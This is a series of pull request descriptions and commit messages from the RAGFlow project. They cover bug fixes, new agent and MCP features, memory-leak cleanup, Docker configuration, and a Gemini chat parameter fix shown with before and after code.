- [x] Bug Fix (non-breaking change which fixes an issue)
Co-authored-by: 海贼宅 <stu_xyx@163.com>
### What problem does this PR solve?
_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [x] Refactoring
- [x] Performance Improvement
- [ ] Other (please describe):
Signed-off-by: zhanluxianshen <zhanluxianshen@163.com>
### What problem does this PR solve?
Add document viewers for text and markdown files
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Import and export MCP Server #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix bugs on the dataset page: the Input component now supports icons, a
Radio component is added, and antd is removed from the chunk-result-bar
page [#3221](https://github.com/infiniflow/ragflow/issues/3221)
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Change document status in bulk.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Add xAI provider (experimental feature, requires user feedback).
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Modify the agent tool name #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fixes a function name typo for the `/list` route in
`api/apps/conversation_app.py`.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Avoid the form sheet covering the chat sheet #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
The rm function in chunk_app.py now takes the index name differently
than other functions, so there will be situations where users can create
and update a chunk but not delete it.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Based on https://github.com/infiniflow/ragflow/issues/8740
1. Handle the "'NoneType' object is not subscriptable" error more
gracefully
2. Add some logs to expose the internal message
### Type of change
- [x] Refactoring
### What problem does this PR solve?
Changed the default value of `chunk_token_num` from 128 to 512 in both
HTTP and Python API reference documentation to reflect the updated
configuration.
#8753
### Type of change
- [x] Documentation Update
### What problem does this PR solve?
Updated the default `chunk_token_num` value in `api_utils.py` and
`validation_utils.py` to 512 to accommodate larger text chunks. Adjusted
corresponding test cases in HTTP and SDK API tests to reflect this
change.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Display MCP multiple selection bar #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
- Validate dialog name in `dialog_app.py` to ensure it is a non-empty
string and does not exceed 255 bytes in UTF-8 encoding.
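The check described above can be sketched roughly as follows. This is a
minimal illustration, not the code in `dialog_app.py`: the function name
`validate_dialog_name`, the error messages, and the choice to treat a
whitespace-only name as empty are all assumptions.

```python
def validate_dialog_name(name, max_bytes=255):
    """Return an error message for an invalid name, or None if it is valid.

    Hypothetical helper: the name and messages are illustrative only.
    """
    if not isinstance(name, str):
        return "Dialog name must be a string."
    # Assumption: a name made only of whitespace counts as empty.
    if not name.strip():
        return "Dialog name can't be empty."
    # The limit is measured in UTF-8 bytes, not characters, so a short
    # string of multi-byte characters can still exceed it.
    size = len(name.encode("utf-8"))
    if size > max_bytes:
        return f"Dialog name is {size} bytes, which exceeds {max_bytes}."
    return None
```

Measuring bytes rather than characters matters for non-ASCII names: 86
CJK characters already take 258 bytes in UTF-8.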
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fetch the data on the dataset page through the API. While existing files
are being parsed, poll only the current page's data every 5 seconds
instead of fetching all data every 15 seconds.
[#3221](https://github.com/infiniflow/ragflow/issues/3221)
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
This commit introduces a comprehensive test suite for the dialog app,
including tests for creating, updating, retrieving, listing, and
deleting dialogs. Additionally, the common.py file has been updated to
include necessary API endpoints and helper functions for dialog
operations.
### Type of change
- [x] Add test cases
### What problem does this PR solve?
1. Remove the redundant pop logic, since the condition is already
checked by the preceding if statement
2. Merge the logging logic
### Type of change
- [x] Refactoring
### What problem does this PR solve?
Added support for preview of txt, md, excel, csv, ppt, image, doc and
other files [#3221](https://github.com/infiniflow/ragflow/issues/3221)
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Get the running log of each message through the trace interface
#3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
'handleOk' was used before it was defined (eslint
`@typescript-eslint/no-use-before-define`).
### What problem does this PR solve?
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Suppress docker-compose warnings such as:
```bash
The "HF_ENDPOINT" variable is not set. Defaulting to a blank string.
The "MACOS" variable is not set. Defaulting to a blank string.
The "SANDBOX_EXECUTOR_MANAGER_IMAGE" variable is not set. Defaulting to a blank string.
The "SANDBOX_EXECUTOR_MANAGER_PORT" variable is not set. Defaulting to a blank string.
```
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [x] Refactoring
### What problem does this PR solve?
Use use-chunk-request.ts to replace chunk-hooks.ts; implement chunk
selectAll, enable, disable and other functions
[#3221](https://github.com/infiniflow/ragflow/issues/3221)
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
- Ensure consistent Minio deployment by pinning the image to a specific
release version (RELEASE.2025-06-13T11-33-47Z) for stability and
reproducibility.
- #8672
### Type of change
- [x] Refactoring
### What problem does this PR solve?
Feat: Support uploading files when running agent #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
fix: retry embedding with Qwen family models when rate limits are
temporarily reached.
The APIs of Qwen family models are rate limited. When the limit is
reached, the "output" attribute of "resp" is None, which in turn causes
a TypeError when trying to retrieve "embeddings". Since these limits are
usually temporary, I have added a simple retry mechanism to work around
them. In addition, if retry_max is reached, the error is raised early
instead of being hidden behind a "TypeError".
### What problem does this PR solve?
Sometimes Qwen blocks calls due to rate limits, which stops the whole
parsing procedure when creating a knowledge base. In this situation,
resp["output"] is None, and resp["output"]["embeddings"] raises a
TypeError. Since the limits are temporary, I apply a simple retry
mechanism to solve it.
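A rough sketch of such a retry loop is shown below. It is not the code
from this PR: `embed_with_retry`, the `call_api` callable, and the
`delay` parameter are hypothetical names, and the real client call is
replaced by whatever `call_api` does. Only `retry_max` and the
`resp["output"]["embeddings"]` shape come from the description above.

```python
import time


def embed_with_retry(call_api, texts, retry_max=5, delay=1.0):
    """Call a rate-limited embedding API, retrying while "output" is None.

    call_api is a hypothetical callable that returns a dict-like response.
    """
    for attempt in range(retry_max):
        resp = call_api(texts)
        output = resp["output"]
        # A rate-limited response carries no output; indexing it with
        # ["embeddings"] would raise the TypeError described above.
        if output is not None and "embeddings" in output:
            return output["embeddings"]
        if attempt < retry_max - 1:
            time.sleep(delay)
    # Fail with an explicit error instead of an opaque TypeError.
    raise RuntimeError(f"Embedding failed after {retry_max} attempts.")
```

A fixed delay keeps the sketch short; an exponential backoff would be a
natural variation if the limits last longer.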
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
---------
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
Fix the case where pages variable might be None
### What problem does this PR solve?
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
1. The old base image no longer included the curl command; an updated
image is used to fix this (the service has been tested with the new
version)
2. Add a health check
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix a small typo in count of used fragments.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
---------
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
Fix: Wrong Citation Display #8594 #8474
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
fix: Create a new message component to replace the antd message
component, create a new Spin component to replace the antd Spin
component, optimize the style of the original pagination component, and
optimize the chunk result page
[#3221](https://github.com/infiniflow/ragflow/issues/3221)
### Type of change
- [X] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Optimized the style of the dataset configuration page and added the
logic of cancelling submission
[#3221](https://github.com/infiniflow/ragflow/issues/3221)
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Resolves ambiguity and potential MITM attacks by using the official
channel for chromedriver-linux in download_deps.py
### Type of change
- [x] Performance Improvement
### What problem does this PR solve?
Fix: Fixed the issue where the debug form Switch component had no
default value #3221
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: Fixed the issue of retrieval operator text overlapping #3221
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
Feat: Edit the output data of the code operator #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Display the iteration operator toolbar #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Optimize the style and logic of the profile
[#3221](https://github.com/infiniflow/ragflow/issues/3221)
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Combine the output logs of the same operator together #3221
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Issue #8602
`parser_config.task_page_size` can default to `None` when a dataset is
created through the API. The `task_executor.py` code did not handle this
case, so `page_size` could sometimes be `None`, which causes an error at
line 351.
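The pitfall can be illustrated with a small sketch. It assumes
`parser_config` is a plain dict; the helper name `resolve_page_size` and
the fallback value of 12 are assumptions made for illustration, not
taken from `task_executor.py`.

```python
DEFAULT_TASK_PAGE_SIZE = 12  # assumed fallback, for illustration only


def resolve_page_size(parser_config, default=DEFAULT_TASK_PAGE_SIZE):
    """Return a usable page size even when the stored value is None."""
    # dict.get(key, default) only falls back when the key is missing.
    # A key that is present with the value None is returned as None,
    # so the None case has to be checked explicitly.
    page_size = (parser_config or {}).get("task_page_size")
    return default if page_size is None else page_size
```

With this helper, `{"task_page_size": None}` and `{}` both resolve to
the fallback, while an explicit value is kept.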
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
The following error occurred during local testing, which should be fixed
by configuring 'exist_ok=True'.
```log
set_progress(7461edc2535c11f0a2aa0242c0a82009), progress: -1, progress_msg: 21:41:41 Page(1~100000001): [ERROR][Errno 17] File exists: '/ragflow/tmp'
```
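As a minimal sketch of the idea (the helper name `ensure_dir` is
hypothetical and the actual call site is not shown in this
description), `os.makedirs` with `exist_ok=True` does not raise when
the directory is already there:

```python
import os
import tempfile


def ensure_dir(path):
    """Create path if needed; do nothing if the directory already exists."""
    # Without exist_ok=True, a second call raises FileExistsError
    # ([Errno 17] File exists), for example when two workers race to
    # create the same temporary directory.
    os.makedirs(path, exist_ok=True)
    return path


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as base:
        target = os.path.join(base, "tmp")
        ensure_dir(target)
        ensure_dir(target)  # safe to repeat
```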
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Update Chrome download URL in use_china_mirrors configuration
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Co-authored-by: lqh <liqunhuan@foreveross.com>
### What problem does this PR solve?
Feat: Convert the arguments parameter of the code operator to a
dictionary #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix the config option name of the opendal table name and setting of
'max_allowed_packet'.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Signed-off-by: He Wang <wanghechn@qq.com>
### What problem does this PR solve?
This PR introduces Google Cloud Vision API integration to enhance image
understanding capabilities in the application. It addresses the need for
advanced image description and chat functionalities by implementing a
new `GoogleCV` class to handle API interactions and updating relevant
configurations. This enables users to leverage Google Cloud Vision for
image-to-text tasks, improving the application's ability to process and
interpret visual data.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Construct the to field of the classification operator when saving
data #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
- Add comprehensive test suite for chunk operations including:
  - Test files for create, list, retrieve, update, and delete chunks
  - Authorization tests
  - Batch operations tests
- Update test configurations and common utilities
- Validate `important_kwd` and `question_kwd` fields are lists in
chunk_app.py
- Reorganize imports and clean up duplicate code
### Type of change
- [x] Add test cases
### What problem does this PR solve?
docx parse error.

### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Parsing some docx files with the naive parser raises an error:
`block.style.name` in the function `__get_nearest_title` can be None in
some cases.
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
Co-authored-by: wenxuan.zhang <wenxuan.zhang@chinacreator.com>
### What problem does this PR solve?
Fix: Fixed the issue that the global variables of the code operator
cannot be selected #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Fixed the issue where variables were not displayed in the switch
operator #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
This PR addresses an incompatibility issue with the Google Chat API by
correcting the message content format in the `GoogleChat` class.
Previously, the content was directly assigned to the "parts" field,
which did not align with the API's expected format. This change ensures
that messages are properly formatted with a "text" key within a
dictionary, as required by the API.
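The format change can be sketched as follows. This is an illustration
rather than the code in the `GoogleChat` class: the helper name
`to_google_history` is hypothetical, and wrapping the dictionary in a
list under "parts" is an assumption about the expected payload shape.

```python
from copy import deepcopy


def to_google_history(history):
    """Convert OpenAI-style messages to a "parts"-based message list."""
    converted = []
    for message in history:
        item = deepcopy(message)  # leave the caller's history untouched
        if item.get("role") == "assistant":
            item["role"] = "model"
        if "content" in item:
            # Before the fix the raw string was assigned to "parts";
            # here it is wrapped in a dictionary under a "text" key.
            item["parts"] = [{"text": item.pop("content")}]
        converted.append(item)
    return converted
```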
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Add agent advanced settings form #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: the output log is incorrect
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
Co-authored-by: liang <xiaofeng.liang@landstech.com.cn>
### What problem does this PR solve?
Add file management HTTP_API for operating files
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
This PR enables the `Form` component within the `GoogleModal` to
directly access and manipulate the form state by passing the form
instance from the parent component. This enhances form control and data
manipulation capabilities within the modal, improving the component's
functionality and integration with the parent form.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: In a dialog message, users can enter different types of data #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Switching threading.Lock() to asyncio.Lock(), since threading.Lock() is
blocking.
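The difference can be sketched with a small example. The `worker` and
`main` coroutines are hypothetical and unrelated to the code touched by
this PR; they only show that waiting on an `asyncio.Lock` suspends the
coroutine and leaves the event loop free, whereas acquiring a contended
`threading.Lock` inside a coroutine would block the whole loop.

```python
import asyncio


async def worker(lock, results, name):
    # "async with" suspends this coroutine while the lock is held
    # elsewhere, so other tasks on the event loop keep running.
    async with lock:
        await asyncio.sleep(0)  # stand-in for awaited work
        results.append(name)


async def main():
    lock = asyncio.Lock()
    results = []
    await asyncio.gather(*(worker(lock, results, i) for i in range(3)))
    return results


if __name__ == "__main__":
    print(asyncio.run(main()))
```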
### Type of change
- [x] Performance Improvement
### What problem does this PR solve?
Feat: Fixed the issue that the top toolbar disappears when opening the
agent operator form #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Support GiteeAI model #1853
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Allow users to enter text in the middle of a chat #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Fixed the issue where the begin operator parameters could not be
submitted during debugging #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Display sub-agents in agent form #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Fixed the issue where the prompt menu content was hidden #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Allow users to choose which MCP tools are enabled.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
This PR addresses critical memory leaks in the task executor's image
processing pipeline. The current implementation fails to properly
dispose of PIL Image objects and BytesIO buffers during chunk
processing, leading to progressive memory accumulation that can cause
the task executor to consume excessive memory over time.
### Background context
- The `upload_to_minio` function processes images from document chunks
and converts them to JPEG format for storage.
- PIL Image objects hold significant memory resources that must be
explicitly closed to prevent memory leaks.
- BytesIO objects also consume memory and should be properly disposed of
after use.
- In high-throughput scenarios with many image-containing documents,
these memory leaks can lead to out-of-memory errors and degraded
performance.
### Specific issues fixed
- PIL Image objects were not being explicitly closed after processing.
- BytesIO buffers lacked proper cleanup in all code paths.
- Converted images (RGBA/P to RGB) were not disposing of the original
image object.
- Memory references to large image data were not being cleared promptly.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [x] Performance Improvement
### Changes made
- Added explicit `d["image"].close()` calls after image processing
operations.
- Implemented proper cleanup of converted images when changing formats
from RGBA/P to RGB.
- Enhanced BytesIO cleanup with `try/finally` blocks to ensure disposal
in all code paths.
- Added explicit `del d["image"]` to clear memory references after
processing.
This fix ensures stable memory usage during long-running document
processing tasks and prevents potential out-of-memory conditions in
production environments.
### What problem does this PR solve?
Improve the logic that checks for cancellation.
### Type of change
- [x] Refactoring
---------
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
stack:
```
2025-06-26 17:22:24,739 ERROR 1609 list index out of range
Traceback (most recent call last):
  File "/ragflow/.venv/lib/python3.10/site-packages/flask/app.py", line 880, in full_dispatch_request
    rv = self.dispatch_request()
  File "/ragflow/.venv/lib/python3.10/site-packages/flask/app.py", line 865, in dispatch_request
    return self.ensure_sync(self.view_functions[rule.endpoint])(**view_args) # type: ignore[no-any-return]
  File "/ragflow/api/utils/api_utils.py", line 298, in decorated_function
    return func(*args, **kwargs)
  File "/ragflow/api/apps/sdk/session.py", line 472, in list_session
    print(conv["reference"][message_num])
IndexError: list index out of range
```

### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
Feat: Add StringTransform operator #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
In the prompt-editor component in the web folder, when content is
entered for the first time, the cursor position is wrong and the text
wraps automatically.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Co-authored-by: leonlai <owllai123456>
### What problem does this PR solve?
Fix chunk number error after re-parsing. #8503.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Displays the output variable type selected by the loop operator
#3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
- Include optional `tag_feas` field if present in request
- Add input validation for `important_kwd` and `question_kwd` to ensure
they are lists
- #8462
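The list validation mentioned above could look roughly like this. The
helper name `validate_keyword_fields` and the error message are
assumptions; only the field names `important_kwd` and `question_kwd`
come from the description.

```python
def validate_keyword_fields(req):
    """Return an error message if a keyword field is not a list, else None.

    Hypothetical helper; req is assumed to be the parsed request body.
    """
    for field in ("important_kwd", "question_kwd"):
        # Both fields are optional, so only validate them when present.
        if field in req and not isinstance(req[field], list):
            return f"`{field}` should be a list"
    return None
```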
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Customize the output variable name of the loop operator #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Add UserFillUpForm component #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Add MCP dashboard functionalities list_tools and test_tool.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
This PR addresses an issue in the presentation parser where the
`layout_recognize` configuration was incorrectly retrieved from
`kwargs.get("layout_recognize", "DeepDOC")`. Instead, it should be
sourced from the `parser_config` parameter, specifically
`parser_config.get("layout_recognize", "DeepDOC")`.
This mismatch could cause the parser to default to the "DeepDOC" layout
recognizer, ignoring any alternative recognition method specified in the
parser configuration. As a result, PDF document parsing might use an
incorrect recognition engine.
The fix ensures the presentation parser consistently uses the
`layout_recognize` setting from `parser_config`, aligning with the
configuration access patterns used elsewhere in the codebase.
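The mismatch can be reproduced with a small sketch. The two function
names and the "Plain Text" value are hypothetical and stand in for the
presentation parser's entry point; the two `get` expressions are the
ones quoted above.

```python
def recognizer_before_fix(parser_config=None, **kwargs):
    # The setting lives inside parser_config, so looking it up in the
    # remaining keyword arguments always falls back to the default.
    return kwargs.get("layout_recognize", "DeepDOC")


def recognizer_after_fix(parser_config=None, **kwargs):
    parser_config = parser_config or {}
    return parser_config.get("layout_recognize", "DeepDOC")


if __name__ == "__main__":
    config = {"layout_recognize": "Plain Text"}  # assumed example value
    print(recognizer_before_fix(parser_config=config))
    print(recognizer_after_fix(parser_config=config))
```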
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Allow operators inside the loop operator to reference the output
parameters of external operators #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Add retrieval tool #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
This PR adds fields to the `Chunk` class to store retrieval results like
similarity scores, term similarity, vector similarity, positions, and
document type. This allows the chunk object to hold all the information
needed when returning search results from the vector database.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Previous:
- Defaulted to hardcoded model 'BAAI/bge-large-zh-v1.5@BAAI'
- Did not respect user-configured default embedding_model
Now:
- Correctly prioritizes user-configured default embedding_model
Other:
- Make embedding_model optional in CreateDatasetReq with proper None
handling
- Add default embedding model fallback in dataset update when empty
- Enhance validation utils to handle None values and string
normalization
- Update SDK default embedding model to None to match API changes
- Adjust related test cases to reflect new validation rules
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
https://github.com/infiniflow/ragflow/issues/8324
docker image version: v0.19.1
The `_clean_conf` function was defined but never called in the `_chat`
and `chat_streamly` methods of the `GeminiChat` class, causing the error
"Unknown field for GenerationConfig: max_tokens" when the default LLM
config includes the "max_tokens" parameter.
**Buggy code (`ragflow/rag/llm/chat_model.py`)**
```python
class GeminiChat(Base):
    def __init__(self, key, model_name, base_url=None, **kwargs):
        super().__init__(key, model_name, base_url=base_url, **kwargs)
        from google.generativeai import GenerativeModel, client
        client.configure(api_key=key)
        _client = client.get_default_generative_client()
        self.model_name = "models/" + model_name
        self.model = GenerativeModel(model_name=self.model_name)
        self.model._client = _client
    def _clean_conf(self, gen_conf):
        for k in list(gen_conf.keys()):
            if k not in ["temperature", "top_p"]:
                del gen_conf[k]
        return gen_conf
    def _chat(self, history, gen_conf):
        from google.generativeai.types import content_types
        system = history[0]["content"] if history and history[0]["role"] == "system" else ""
        hist = []
        for item in history:
            if item["role"] == "system":
                continue
            hist.append(deepcopy(item))
            item = hist[-1]
            if "role" in item and item["role"] == "assistant":
                item["role"] = "model"
            if "role" in item and item["role"] == "system":
                item["role"] = "user"
            if "content" in item:
                item["parts"] = item.pop("content")
        if system:
            self.model._system_instruction = content_types.to_content(system)
        response = self.model.generate_content(hist, generation_config=gen_conf)
        ans = response.text
        return ans, response.usage_metadata.total_token_count
    def chat_streamly(self, system, history, gen_conf):
        from google.generativeai.types import content_types
        if system:
            self.model._system_instruction = content_types.to_content(system)
        # ❌ _clean_conf was not implemented
        for k in list(gen_conf.keys()):
            if k not in ["temperature", "top_p", "max_tokens"]:
                del gen_conf[k]
        for item in history:
            if "role" in item and item["role"] == "assistant":
                item["role"] = "model"
            if "content" in item:
                item["parts"] = item.pop("content")
        ans = ""
        try:
            response = self.model.generate_content(history, generation_config=gen_conf, stream=True)
            for resp in response:
                ans = resp.text
                yield ans
            yield response._chunks[-1].usage_metadata.total_token_count
        except Exception as e:
            yield ans + "\n**ERROR**: " + str(e)
        yield 0
```
**Implement the _clean_conf function**
```python
class GeminiChat(Base):
    def __init__(self, key, model_name, base_url=None, **kwargs):
        super().__init__(key, model_name, base_url=base_url, **kwargs)
        from google.generativeai import GenerativeModel, client
        client.configure(api_key=key)
        _client = client.get_default_generative_client()
        self.model_name = "models/" + model_name
        self.model = GenerativeModel(model_name=self.model_name)
        self.model._client = _client
    def _clean_conf(self, gen_conf):
        for k in list(gen_conf.keys()):
            if k not in ["temperature", "top_p"]:
                del gen_conf[k]
        return gen_conf
    def _chat(self, history, gen_conf):
        from google.generativeai.types import content_types
        # ✅ implement _clean_conf to remove the wrong parameters
        gen_conf = self._clean_conf(gen_conf)
        system = history[0]["content"] if history and history[0]["role"] == "system" else ""
        hist = []
        for item in history:
            if item["role"] == "system":
                continue
            hist.append(deepcopy(item))
            item = hist[-1]
            if "role" in item and item["role"] == "assistant":
                item["role"] = "model"
            if "role" in item and item["role"] == "system":
                item["role"] = "user"
            if "content" in item:
                item["parts"] = item.pop("content")
        if system:
            self.model._system_instruction = content_types.to_content(system)
        response = self.model.generate_content(hist, generation_config=gen_conf)
        ans = response.text
        return ans, response.usage_metadata.total_token_count
    def chat_streamly(self, system, history, gen_conf):
        from google.generativeai.types import content_types
        # ✅ implement _clean_conf to remove the wrong parameters
        gen_conf = self._clean_conf(gen_conf)
        if system:
            self.model._system_instruction = content_types.to_content(system)
        # ✅ Removed duplicate parameter filtering logic "for k in list(gen_conf.keys()):"
        for item in history:
            if "role" in item and item["role"] == "assistant":
                item["role"] = "model"
            if "content" in item:
                item["parts"] = item.pop("content")
        ans = ""
        try:
            response = self.model.generate_content(history, generation_config=gen_conf, stream=True)
            for resp in response:
                ans = resp.text
                yield ans
            yield response._chunks[-1].usage_metadata.total_token_count
        except Exception as e:
            yield ans + "\n**ERROR**: " + str(e)
        yield 0
```
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
---------
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
Feat: Filter the query variable drop-down box options by type #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
This PR fixes a typo in the variable name `succesfulFilenames`,
correcting it to `successfulFilenames`. This ensures consistency and
avoids potential errors due to the misspelled variable.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: when using external components, the port could not be specified
because the variables in the `docker/.env` file were not referenced by
`docker/service_conf.yaml.template`.
382d2d0373/docker/.env (L85)
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Insert the node data of the bottom subagent into the tool array of
the head agent #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Using the QA chunking method with a large PDF (e.g., 300+ pages) may
lead to OOM in the ragflow-worker module.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Add MCP streamable-http transport.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
https://github.com/infiniflow/ragflow/issues/8466
I went through the code. The current logic is:
When do_handle_task raises an exception, handle_task sets the
progress. In some cases, however, do_handle_task simply returns
internally without setting the right progress. In those cases the Redis
stream message is acked while the task still appears to be running.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
---------
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
Add MCP server dashboard operations.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [x] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
This PR fixes #8271 by widening a column's type from int to float when
any value in the column falls outside the range of the long type.
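The rule above can be sketched as follows. This is a minimal illustration only: the helper names are hypothetical and are not taken from the RAGFlow codebase, and the sketch assumes "long" means a signed 64-bit integer.

```python
# Hypothetical helpers; names and structure are illustrative, not RAGFlow's API.
INT64_MIN = -(2**63)       # assumed lower bound of the "long" type
INT64_MAX = 2**63 - 1      # assumed upper bound of the "long" type


def infer_numeric_column_type(values):
    """Return "int" if every integer fits in a signed 64-bit long, else "float"."""
    for v in values:
        if isinstance(v, int) and not (INT64_MIN <= v <= INT64_MAX):
            return "float"
    return "int"


def coerce_column(values):
    """Convert the whole column to float once any value overflows the long range."""
    if infer_numeric_column_type(values) == "float":
        return [float(v) for v in values]
    return list(values)
```

Converting the whole column, rather than only the overflowing cell, keeps a single type per column, at the cost of float precision for very large values.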
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Add IterationNode component #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
Saving an RGBA image directly as JPEG will cause an error. If the image
is in RGBA mode, convert it to RGB mode before saving it in JPG format.
### What problem does this PR solve?
During document parsing in the knowledge base, we occasionally encounter
